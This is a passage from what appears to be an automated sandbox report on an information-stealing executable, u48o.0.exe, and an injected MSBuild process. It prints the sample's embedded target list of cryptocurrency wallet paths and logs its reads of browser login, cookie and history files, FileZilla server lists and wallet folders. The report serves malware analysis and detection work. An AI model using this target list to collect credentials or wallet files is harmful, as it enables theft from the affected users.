Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
